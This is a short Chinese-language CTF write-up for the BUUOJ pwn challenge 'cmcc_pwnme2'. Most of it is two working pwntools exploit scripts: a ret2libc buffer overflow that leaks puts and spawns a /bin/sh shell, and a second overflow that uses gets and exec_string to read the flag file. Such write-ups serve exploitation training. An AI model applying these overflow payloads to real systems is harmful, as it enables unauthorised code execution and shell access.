cmcc_pwnme2
查看保护
直接用的ret2libc。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27722)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']
p1 = b'a' * (0x6c + 4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(p1)
puts_addr = u32(r.recvuntil('\xf7')[-4:].ljust(4, b'\x00'))
success('puts_addr = ' + hex(puts_addr))
libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()
p2 = b'a' * (0x6c + 4) + p32(system_addr) + p32(main_addr) + p32(bin_sh)
r.sendline(p2)
r.interactive()
看了一下其它函数,发现题意应该是借助这三个函数来拿flag。
这个函数会打开string这里的文件
这两个文件是个目录,借助栈溢出这个漏洞执行exec_string这个函数。string里填充add_home add_flag即可。但是buu的话本目录下就有flag。所以打buu远程的话string改成flag即可。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27722)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
gets_plt = elf.plt['gets']
exec_string = 0x80485CB
p1 = b'a' * (0x6c + 4) + p32(gets_plt) + p32(exec_string) + p32(0x804a060)
r.sendline(p1)
r.sendline('flag')
r.interactive()